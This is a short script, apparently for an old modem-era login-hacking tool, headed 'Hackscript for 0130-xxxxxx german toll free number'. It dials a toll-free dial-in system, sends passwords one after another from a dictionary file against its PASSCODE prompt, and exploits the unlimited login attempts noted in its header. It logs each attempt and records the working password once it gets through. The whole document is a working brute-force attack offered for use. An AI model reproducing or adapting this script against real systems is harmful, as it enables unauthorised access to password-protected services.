;
;
; --------------------------------------------------------------------
;  Hackscript for 0130-xxxxxx german toll free number (by MindManiac)
; --------------------------------------------------------------------
;
; System asks for a password
; Unlimited input attempts possible
;
; 30xCrLf
; PASSCODE:*****
;

#DEFINE
INIT_MODEM=AT &F L2
INIT_DATA=8N1
LOGFILE=xxxxxx.LOG
PHONE_NR=0130xxxxxx
DIAL_TRIES=5
LOGIN_TRIES=0
DIC(1)=C:\2\thc-lh09\w1.w

#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)

#START
LOG(--------------------------------------------------------------------------)
LOG(TARGET : $PHONE_NR    ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(30,.^M,3,GOTO(1),PASS)
:2
set string=
SEND_NEXT_DIC(1)
wait(1)
LOG($DIC(1))
; yeah, log every attempt!
WAIT4STRING(15,.^M,3,GOTO(3),PASS)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND()
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)

#END
